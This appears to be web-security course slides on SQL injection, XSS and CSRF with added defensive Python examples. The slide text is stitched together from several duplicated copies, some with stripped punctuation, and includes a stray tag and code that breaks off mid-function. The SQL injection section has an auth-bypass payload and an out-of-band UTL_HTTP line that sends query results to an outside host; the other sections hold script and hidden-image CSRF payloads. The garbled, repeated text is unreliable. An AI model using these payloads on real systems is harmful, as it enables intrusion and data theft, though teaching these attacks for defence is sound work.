bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
• SELECT * FROM Users WHERE ((Username='$username') AND
(Password=MD5('$password')))
$username = 1' or '1' = '1'))
$password = foo
Then the query becomes:
SELECT * FROM Users WHERE ((Username='1' or '1'='1'))') AND
(Password=MD5('foo')))
All the columns of the Users table will be returned when the query above is executed.
Types of SQL Injection attacks
• In-band
The data retrieved by the injected SQL code is displayed directly in the web application page.
SELECT FROM WHERE USERNAME='VENKAT'
• Out-of-band
The data is retrieved through a different channel (for example, the results are sent in an email to the attacker).
UTL_HTTP.REQUEST can be used to send the SQL query results to a remote IP address.
A request for an out-of-band attack can look like:
• http://www.example.com/product.php?id=10||UTL_HTTP.request('testerserver.com:80')
• Inferential or Blind
1. No data is retrieved in this type of attack.
2. Requests are submitted and the DB server's responses are observed to reconstruct the query.
3. Blind attacks are used when the server does not return data and only a generic error message is displayed.
Prevention of SQL Injection
• Assume all user-submitted data is evil and validate everything
• Ensure that application users have the least privileges
• Install patches and updates as soon as possible
• Display a generic error message instead of printing the stack trace
• Use stored procedures and do not expose sensitive details
How to test for SQL Injection
• Analyze the areas where the application talks to the database server
• Input data using a data fuzzer or a predefined list of data
• Monitor the responses from the server
• If the application prints a stack trace in the error, modify the query and try again
• If the application returns a generic error, look for the error message in the page source code
• If the application gives no information, use the blind injection technique
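The login query from the slide above, run both ways as an added example (not code from the deck): string concatenation, which lets the username payload rewrite the statement, beside the same query with bound parameters, which is the "validate everything" control in practice. It uses an in-memory SQLite table with constructed accounts, registers an MD5() function because SQLite lacks one, and appends a SQL line comment to the slide's payload so the template's trailing `') AND (Password=...)` is ignored (without it the concatenated statement is not valid SQL).

```python
import hashlib
import sqlite3


def md5_hex(value: str) -> str:
    """Stand-in for the MD5() function used in the slide's query.

    SQLite has no built-in MD5, so it is registered on the connection below.
    """
    return hashlib.md5(value.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two accounts, passwords stored as MD5 as on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, md5_hex)
    conn.execute("CREATE TABLE Users (UserId INTEGER, Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, MD5(?))",
        [(1, "alice", "correct horse"), (2, "bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The slide's query assembled by string concatenation (deliberately vulnerable).

    User input is pasted into the statement text, so quotes and parentheses in
    the input change the SQL that the database parses.
    """
    sql = (
        "SELECT * FROM Users WHERE ((Username='" + username + "') "
        "AND (Password=MD5('" + password + "')))"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The same query with bound parameters.

    The statement text is fixed; the driver passes the values separately, so the
    input is only ever compared as data and never parsed as SQL.
    """
    sql = "SELECT * FROM Users WHERE ((Username=?) AND (Password=MD5(?)))"
    return conn.execute(sql, (username, password)).fetchall()


def compare_logins() -> tuple:
    """Return (rows from vulnerable login, rows from parameterized login, rows for a real user)."""
    conn = make_db()
    # The slide's username payload. A '--' line comment is appended (assumption made
    # here) so the template's trailing ') AND (Password=...)' is ignored; without it
    # the concatenated statement is not valid SQL.
    payload = "1' or '1'='1'))--"
    injected = login_vulnerable(conn, payload, "foo")
    parameterized = login_parameterized(conn, payload, "foo")
    legitimate = login_parameterized(conn, "bob", "hunter2")
    return len(injected), len(parameterized), len(legitimate)


if __name__ == "__main__":
    print(compare_logins())  # (2, 0, 1)
```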
Cross Site Scripting
• XSS is the short form of Cross Site Scripting
• XSS lets an attacker attack the users of a site by injecting a script into a web page
• The script gets executed when any user visits the page
• It does not attack the web application server or database
• It breaks the trust the user has in the web application
Key players in XSS
• Browser
• External Sources
Browser
1. The browser receives information from the server, which can be classified as data and instructions
2. It displays data as normal plain text
3. It executes instructions within the instruction context
4. It also executes instructions which are part of data
For example, consider that the delivery instructions for a product are entered as:
This is a <script>alert(1)</script> Test order
Default Browser behavior
1. User requests a site
2. Server responds with HTML, CSS, JavaScript etc. files
3. Browser displays the content given by the site
External Source
• If an application does not validate user input properly, user input along with a malicious script gets into the application
• The browser executes the script which is part of the input when it receives the data from the server in the form of a response
Possible Sources of User input
1. Browsers receive information from external sources and the server
2. Form inputs
3. Reviews or comments
4. Query string parameter values
So improper handling of input data coming from an external source is a cause of Cross Site Scripting
Sample Scenario
1. User 1 posts a comment containing <script> tags to the server
2. User 2 views the comments page and User 2's browser executes the script
3. User 1 steals User 2's data
What can be done by using Cross Site Scripting
• Stealing user cookies
• Stealing confidential information
• Malicious redirects
>> Redirecting to an attacker site and asking for login credentials
• Social engineering
>> Injecting new HTML code and asking for personal information, credit card details etc.
• Performing clipboard theft
Types of Cross Site Scripting
• Persistent XSS
The script injected into an input field is stored on the web server (database, file etc.) and the same data is displayed to other users
• Reflected XSS
The injected script is not stored on the server but is sent back to the browser directly for display, and the browser executes the script
• DOM XSS
The injected script uses DOM data to display a section of the web page and perform other actions of the attacker's intention. It does not require server side interaction
Example: document.URL, window.name etc.
Preventing XSS
• Filtering data
If the user provides <script>alert(1)</script> then after filtering it becomes alert(1). So the browser simply displays the text and will not execute any instruction
• Encoding data
1. If the user provides <script>alert(1)</script> then after encoding it becomes &lt;script&gt;alert(1)&lt;/script&gt;
2. When the encoded data is sent to the browser it will be displayed as <script>alert(1)</script> instead of getting executed as a script
A few other methods are also used for preventing XSS ...
How to Test for XSS vulnerability
1. Identify all input fields like HTTP parameters, POST data, hidden form field values and predefined radio or selection values
2. Enter specially crafted data into the input fields
3. Analyze the resulting HTML response and search for the input data
4. Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our web applications
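The two defences from "Preventing XSS" and steps 2 to 4 of the test procedure above, as an added example that is not part of the deck. The page template, the marker string and the three handling modes are constructed for this example; the audit function reports which of the HTML-special characters the server echoed back unencoded, which is what distinguishes "filter the script tag" from "encode the output".

```python
import html
import re

# Assumed server-side template (constructed for this example): the delivery note
# from the slide is placed inside the HTML body.
PAGE_TEMPLATE = "<html><body><p>Delivery instructions: {note}</p></body></html>"

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)
# An '&' that does not start an entity such as &lt; or &#x27; came back unencoded.
RAW_AMPERSAND = re.compile(r"&(?![A-Za-z#][A-Za-z0-9]*;)")


def filter_script_tags(text: str) -> str:
    """Filtering as on the slide: strip <script> tags, keep the text between them."""
    return SCRIPT_TAG.sub("", text)


def encode_for_html(text: str) -> str:
    """Encoding as on the slide: turn the HTML-special characters into entities.

    The browser renders them as literal text and never treats them as markup.
    """
    return html.escape(text, quote=True)


def render_page(note: str, handling: str) -> str:
    """Build the response the way a server would with no / filter / encode handling."""
    if handling == "none":
        shown = note
    elif handling == "filter":
        shown = filter_script_tags(note)
    elif handling == "encode":
        shown = encode_for_html(note)
    else:
        raise ValueError("unknown handling: " + handling)
    return PAGE_TEMPLATE.format(note=shown)


def probe_value(marker: str) -> str:
    """Step 2 of the slide's test: a marker wrapping every HTML-special character."""
    return marker + "<>\"'&" + marker


def unencoded_specials(marker: str, response: str) -> set:
    """Steps 3 and 4: find where the probe was echoed and report the raw characters.

    Returns the subset of < > " ' & that reached the response without encoding.
    """
    pattern = re.escape(marker) + r"(.*?)" + re.escape(marker)
    raw = set()
    for echoed in re.findall(pattern, response, re.DOTALL):
        raw.update(c for c in "<>\"'" if c in echoed)
        if RAW_AMPERSAND.search(echoed):
            raw.add("&")
    return raw


def audit(handling: str) -> set:
    """Submit the probe against one handling mode and return what came back raw."""
    marker = "zq9x"  # constructed; unlikely to occur naturally in the page
    return unencoded_specials(marker, render_page(probe_value(marker), handling))


if __name__ == "__main__":
    for mode in ("none", "filter", "encode"):
        print(mode, sorted(audit(mode)))
```

Filtering only removes the one tag it knows about, so the probe's special characters still come back raw; encoding leaves none of them raw, which is why output encoding is the defence to rely on.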
Cross Site Request Forgery
What is CSRF
• A CSRF attack forces an end user to execute unwanted actions on a web application in which the user is currently authenticated
• For example, this attack could result in a transfer of funds, changing a password or purchasing an item in the user's context
• In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds transfer, form submission etc.) via the target's browser without the knowledge of the target user, at least until the unauthorized function has been committed
Sample Scenario
Request: http://www.gmail.com/deleteAllMessages, sent to the victim site together with the Session ID cookie
• Consider that Gmail relies only on information known to the browser
• For an authenticated user the browser will automatically send the cookie with subsequent requests
• The request in the figure can be generated in three ways:
1. By the user
2. By the user typing the URL directly
3. By the user following an external link
Why does CSRF usually happen
• Web browser handling of session information such as cookies and HTTP authentication information
• Attacker possessing knowledge of valid web application URLs
For example: https://www.example.com/myaccount/creditcards
• Application relying entirely on information which is known by the browser
• Existence of HTML tags whose presence causes access to the application resources, such as the <img> tag
For example:
<img src="https://www.example.com/deleteProduct" width="0" height="0">
How does the user get involved in CSRF attacks
• Following the link in an anonymous email or via a chat group
The server responds to the request because the user's session information is automatically sent by the browser with the request
• When the user follows a link which refers to a page containing the following HTML:
<html><body>
<img src="http://www.example.com/action">
</body></html>
Facts about CSRF
• Customers of a bank in Mexico were attacked with an email containing an img tag. The link in the img tag changed the DNS entry for the bank in their routers and pointed it to a malicious website impersonating the bank
• About 18 million users of eBay's internet auction in Korea lost their personal information
• CSRF is ranked as the 8th vulnerability in the OWASP Top Ten vulnerabilities list
How to Test for CSRF weakness in a web application
• Consider a URL u=http://www.example.com/action
• Build an HTML page which contains an HTTP request referencing URL u
• Make sure the user is logged into the application
• Induce the user into following the link pointing to the URL to be tested
• Check if the web server is executing the request
Preventing CSRF attacks
• Including CSRF tokens for each user session
• Submission of double cookies
• Log out from sensitive applications when the work is done
• Do not save any login credentials in the browser
• Using secure browser extensions
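The first two controls above (a per-session CSRF token and the double-submit cookie) applied to the slide's deleteProduct endpoint, as an added example that is not the deck's code. The session store, the request dictionaries and the endpoint handler are constructed for this example; the simulation shows the legitimate form being accepted while the request an <img> tag on another site produces, and a cross-site POST without the token, are both refused even though the browser attached the session cookie.

```python
import hmac
import secrets

# Server-side session store (constructed for this example):
# session id -> per-session CSRF token (synchronizer token pattern).
SESSIONS = {}


def login() -> str:
    """Create a session and its CSRF token; returns the session id that becomes the cookie."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return session_id


def render_delete_form(session_id: str) -> dict:
    """What the legitimate page embeds: the session's token as a hidden form field."""
    return {"csrf_token": SESSIONS[session_id]}


def csrf_token_valid(session_id: str, submitted: str) -> bool:
    """Synchronizer token check: the submitted token must equal the session's token."""
    expected = SESSIONS.get(session_id)
    if expected is None or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def double_submit_valid(cookies: dict, form: dict) -> bool:
    """Double-submit cookie check: the form must repeat the value of the csrf cookie.

    A page on another origin can make the browser send the cookie but cannot read
    it, so it cannot place the same value in the form.
    """
    cookie_value = cookies.get("csrf", "")
    submitted = form.get("csrf", "")
    return bool(cookie_value) and hmac.compare_digest(cookie_value.encode(), submitted.encode())


def handle_delete_product(request: dict) -> str:
    """State-changing endpoint from the slide's <img src=".../deleteProduct"> example.

    request is a constructed dict: {"method": ..., "cookies": {...}, "form": {...}}.
    """
    session_id = request["cookies"].get("session")
    if session_id not in SESSIONS:
        return "401 not logged in"
    if request["method"] != "POST":
        # An <img> tag can only issue GET, so state changes are accepted over POST only.
        return "405 method not allowed"
    if not csrf_token_valid(session_id, request["form"].get("csrf_token", "")):
        return "403 missing or invalid CSRF token"
    return "200 product deleted"


def simulate() -> tuple:
    """Legitimate submission vs. the forged requests another site can cause."""
    session_id = login()
    cookies = {"session": session_id}  # attached automatically by the browser in every case
    legitimate = {"method": "POST", "cookies": cookies, "form": render_delete_form(session_id)}
    forged_img = {"method": "GET", "cookies": cookies, "form": {}}
    forged_post = {"method": "POST", "cookies": cookies, "form": {}}  # no way to know the token
    return (
        handle_delete_product(legitimate),
        handle_delete_product(forged_img),
        handle_delete_product(forged_post),
    )


if __name__ == "__main__":
    print(simulate())
```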
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How to test for SQL Injection
• Analyze the areas where the application talks to the database server
• Input data using a data fuzzer or a predefined list of test strings
• Monitor the responses from the server
• If the application prints a stack trace in the error, modify the query and try again
• If the application returns a generic error, look for error messages in the page source code
• If the application gives no information at all, use the blind injection technique
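To make the "areas where the application talks to the database" concrete, here is an added example (not code from the slides): the same login lookup written the vulnerable way, by concatenating user input into the SQL text, and the safe way, with bound parameters, run against a constructed in-memory SQLite table. A third function hides database errors behind a generic message, which is the "generic error" situation the testing steps describe: it removes the stack trace but not the flaw. The table, rows and function names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data for the example (assumption, not the slides' schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation: the input becomes SQL text,
    so a quote character in it changes the structure of the query."""
    sql = ("SELECT UserId FROM Users WHERE Username='" + username
           + "' AND Password='" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver sends the input as data,
    so it can never be interpreted as part of the SQL statement."""
    sql = "SELECT UserId FROM Users WHERE Username=? AND Password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def login_generic_error(conn, username, password):
    """Runs the vulnerable query but returns only a generic message on failure.
    This is what an application looks like when it hides stack traces: the
    tester sees 'Login failed' instead of the database error, yet the
    injection is still there, which is why blind techniques still apply."""
    try:
        return {"ok": True, "users": login_vulnerable(conn, username, password)}
    except sqlite3.Error:
        # details would be logged server-side; nothing database-specific goes to the client
        return {"ok": False, "error": "Login failed"}


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, payload))  # every user
    print("safe:      ", login_safe(db, payload, payload))        # no user
    print("generic:   ", login_generic_error(db, "'", "x"))       # error hidden
</test>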
Cross Site Scripting
• XSS is the short form of Cross Site Scripting
• XSS lets an attacker attack the users of a site by injecting a script into a web page
• The script gets executed when any user visits the page
• It does not attack the web application server or the database
• It breaks the trust the user has in the web application
Key players in XSS
• Browser
• External Sources
Browser
1. The browser receives information from the server, which can be classified as data and instructions
2. It displays data as normal plain text
3. It executes instructions within the instruction context
4. It also executes instructions which are part of data
For example, consider that the delivery instructions for a product are entered as:
This is a <script>alert(1)</script> Test order
Default Browser behavior
1. User requests a site
2. Server responds with HTML, CSS, JavaScript etc. files
3. Browser displays the content given by the site
External Source
• If an application does not validate user input properly, the user input, along with any malicious script, gets into the application
• The browser executes the script which is part of the input when it receives the data from the server in the form of a response
Possible Sources of User input
1. Browsers receive information from external sources and from the server
2. Form inputs
3. Reviews or comments
4. Query string parameter values
So improper handling of input data coming from an external source is the cause of Cross Site Scripting
Sample Scenario
Figure: Server, User 1 and User 2
1. User 1 posts a comment which contains <script> tags
2. User 2 views the comments page and the browser executes the script
3. User 1 steals User 2's data
What can be done by using Cross Site Scripting
• Stealing user cookies
• Stealing confidential information
• Malicious redirects
  >> Redirecting to an attacker site and asking for login credentials
• Social engineering
  >> Injecting new HTML code and asking for personal information, credit card details etc.
• Performing clipboard theft
Types of Cross Site Scripting
• Persistent XSS
  The script injected into an input field is stored on the web server (database, file etc.) and the same data is displayed to other users
• Reflected XSS
  The injected script is not stored on the server but is sent straight back to the browser for display, and the browser executes the script in the user's browser
• DOM XSS
  The injected script uses DOM data to display a section of the web page and perform other actions of the attacker's choosing. It does not require server side interaction
  Example: document.URL, window.name etc.
Preventing XSS
• Filtering data
  If the user provides <script>alert(1)</script> then after filtering it becomes alert(1). So the browser simply displays the text and will not execute any instruction
• Encoding data
  1. If the user provides <script>alert(1)</script> then after encoding it becomes &lt;script&gt;alert(1)&lt;/script&gt;
  2. When the encoded data is sent to the browser it will be displayed as <script>alert(1)</script> instead of getting executed as script
A few other methods are also used for preventing XSS …
How to Test for XSS vulnerability
1. Identify all input fields like HTTP parameters, POST data, hidden form field values and predefined radio or selection values
2. Enter specially crafted input data into the input fields
3. Analyze the resulting HTML response and search for the input data
4. Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing on our web applications
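The two prevention methods above (filtering and encoding) and steps 3 and 4 of the test (search the response for the input and find which characters came back unencoded) fit in one added example, which is not code from the slides. It renders a comment the vulnerable way and the encoded way, and a small checker inspects the resulting HTML for special characters that were reflected raw between two canary strings. The canary `xs7q`, the `render_comment_*` functions and the `<p>` markup are constructed for the example; the filter is a deliberately simple tag-stripping regex of the kind the slide describes.

```python
import html
import re

# Canary: a constructed, unlikely string that lets the checker locate our own
# input inside an arbitrary HTML response (assumption, not from the slides).
CANARY = "xs7q"
SPECIALS = "<>\"'"
PROBE = CANARY + SPECIALS + CANARY      # e.g. xs7q<>"'xs7q
SLIDE_INPUT = "<script>alert(1)</script>"  # the input used on the slides


def filter_tags(value):
    """'Filtering' as described on the slides: strip anything shaped like a tag.
    Note what it leaves behind: quote characters, which still matter inside
    an HTML attribute."""
    return re.sub(r"<[^>]*>", "", value)


def encode_html(value):
    """'Encoding': the five HTML special characters become entities, so the
    browser displays them as text instead of parsing them as markup."""
    return html.escape(value, quote=True)


def render_comment_vulnerable(comment):
    """Puts user data into the page unchanged (the 'before' of the fix)."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Same template, but the user data is entity-encoded for the HTML body."""
    return '<p class="comment">' + encode_html(comment) + "</p>"


def unencoded_specials(response_html):
    """Steps 3 and 4 of the XSS test: find every place our probe was reflected
    (text between two canaries) and report which special characters survived
    unencoded. An empty set means the reflection point encoded them all."""
    raw = set()
    pattern = re.escape(CANARY) + r"(.*?)" + re.escape(CANARY)
    for match in re.finditer(pattern, response_html):
        between = match.group(1)
        raw.update(c for c in SPECIALS if c in between)
    return raw


if __name__ == "__main__":
    print(filter_tags(SLIDE_INPUT))   # alert(1)
    print(encode_html(SLIDE_INPUT))   # &lt;script&gt;alert(1)&lt;/script&gt;
    print(unencoded_specials(render_comment_vulnerable(PROBE)))   # all four raw
    print(unencoded_specials(render_comment_safe(PROBE)))         # set()
    print(unencoded_specials(render_comment_vulnerable(filter_tags(PROBE))))  # quotes raw
```

The third result in the demo is the point a tester should take from step 4: tag filtering alone removes `<` and `>` but leaves `"` and `'` in the response, so the same input placed inside an attribute value would still break out of it. Output encoding for the context in which the data lands (HTML body here) is the check the slides' encoding method relies on.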
Cross Site Request Forgery
What is CSRF
• A CSRF attack forces an end user to execute unwanted actions on a web application in which the user is currently authenticated
• For example, this attack could result in a transfer of funds, a changed password or a purchased item in the user's context
• In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds transfer, form submission etc.) via the target's browser without the knowledge of the target user, at least until the unauthorized function has been committed
Sample Scenario
Figure: the browser sends the request http://www.gmail.com/deleteAllMessages, together with the Session ID cookie, to the victim site
• Consider that Gmail relies only on information known to the browser
• For an authenticated user, the browser will automatically send the cookie with subsequent requests
• The request in the figure can be generated in three ways:
  1. By the user
  2. By the user typing the URL directly
  3. By the user following an external link
Why does CSRF usually happen
• Web browser handling of session information such as cookies and HTTP authentication information
• Attacker possessing knowledge of valid web application URLs
  For example https://www.example.com/myaccount/creditcards
• Application relying entirely on information which is known by the browser
• Existence of HTML tags whose presence causes access to application resources, such as the <img> tag
  For example:
  <img src="https://www.example.com/deleteProduct" width="0" height="0" >
How does the user get involved in CSRF attacks
• Following a link in an anonymous email or via a chat group
  The server responds to the request because the user's session information is automatically sent by the browser with the request
• When the user follows a link which refers to a page containing the following HTML:
  <html><body>
  <img src="http://www.example.com/action" >
  </body></html>
Facts about CSRF
• Customers of a bank in Mexico were attacked with an email containing an <img> tag. The link in the <img> tag changed the DNS entry for the bank in their routers and pointed it to a malicious website impersonating the bank
• About 18 million users of eBay's internet auction in Korea lost their personal information
• CSRF is ranked as the 8th vulnerability in the OWASP Top Ten vulnerabilities list
How to Test for CSRF weakness in a web application
• Consider a URL u = http://www.example.com/action
• Build an HTML page which contains an HTTP request referencing URL u
• Make sure the user is logged into the application
• Induce the user into following the link pointing to the URL to be tested
• Check if the web server is executing the request
Preventing CSRF attacks
• Including CSRF tokens for each user session
• Submission of double cookies
• Log out from sensitive applications when the work is done
• Do not save any login credentials in the browser
• Using secure browser extensions
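The first two prevention methods, a per-session CSRF token and the double-submit cookie, as an added example that is not code from the slides. A state-changing endpoint (`handle_transfer`, a constructed name) accepts a request only when the form carries the token the server issued for that session; a cross-site page can make the browser attach the session cookie, but it cannot read or guess the token, so the forged request is refused. The `SESSIONS` store, the dictionary-shaped request objects and the endpoint names are assumptions standing in for a real framework.

```python
import hmac
import secrets

# Constructed in-memory session store (assumption): session id -> session data.
SESSIONS = {}


def create_session(user):
    """Logs a user in and issues one CSRF token that lives as long as the session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """The server embeds this value in every state-changing form it renders
    for the session (for example as a hidden field named csrf_token)."""
    return SESSIONS[sid]["csrf_token"]


def _same(a, b):
    # Constant-time comparison on bytes so the check leaks nothing about the token.
    return hmac.compare_digest(a.encode(), b.encode())


def handle_transfer(request):
    """Synchronizer-token check. `request` is a constructed dict with 'cookies'
    and 'form' (what a browser sends automatically versus what the page's own
    form submitted); a real framework would expose the same two things."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not authenticated"
    submitted = request["form"].get("csrf_token", "")
    # A forged cross-site request arrives with the cookie but without the token.
    if not _same(submitted, session["csrf_token"]):
        return 403, "csrf check failed"
    return 200, "transferred %s for %s" % (request["form"].get("amount"), session["user"])


def handle_transfer_double_submit(request):
    """Double-submit cookie variant: the token is also set as a cookie, and the
    page's own JavaScript copies it into the form. A cross-site page can make
    the browser send the cookie but cannot read it, so it cannot fill the form."""
    cookie_token = request["cookies"].get("csrf", "")
    form_token = request["form"].get("csrf_token", "")
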